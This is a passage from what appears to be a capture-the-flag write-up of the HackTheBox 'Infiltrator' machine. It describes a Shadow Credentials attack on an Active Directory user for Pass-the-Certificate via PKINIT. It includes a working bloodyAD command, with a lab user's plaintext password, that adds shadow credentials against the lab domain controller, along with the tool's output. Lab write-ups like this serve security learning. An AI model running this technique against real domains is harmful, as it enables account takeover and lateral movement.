bytebl33d/bytebl33d.github.io/writeups/HackTheBox/Machines/infiltrator.md

 So how do we get spicy with this?
 We’re about to hit `e.rodriguez` with **Shadow Credentials**—basically stuffing a fake cert into his account like it’s a USB Rubber Ducky in a coffee shop laptop.

-This lets us **Pass the Certificate** using PKINIT, snag a TGT, and suddenly we’re `e.rodriguez` now.
-It’s like Face/Off but for Active Directory.
-Kerberos never saw it coming.

 ```console
 $ bloodyAD --host dc01.infiltrator.htb -d infiltrator.htb -u 'l.clark' -p 'WAT?watismypass!' add shadowCredentials 'e.rodriguez'
 [+] KeyCredential generated with following sha256 of RSA key: 21db2d646e4fd3177d1c18717161109ed382cae2e6ed5529cf1589e41a38ad3c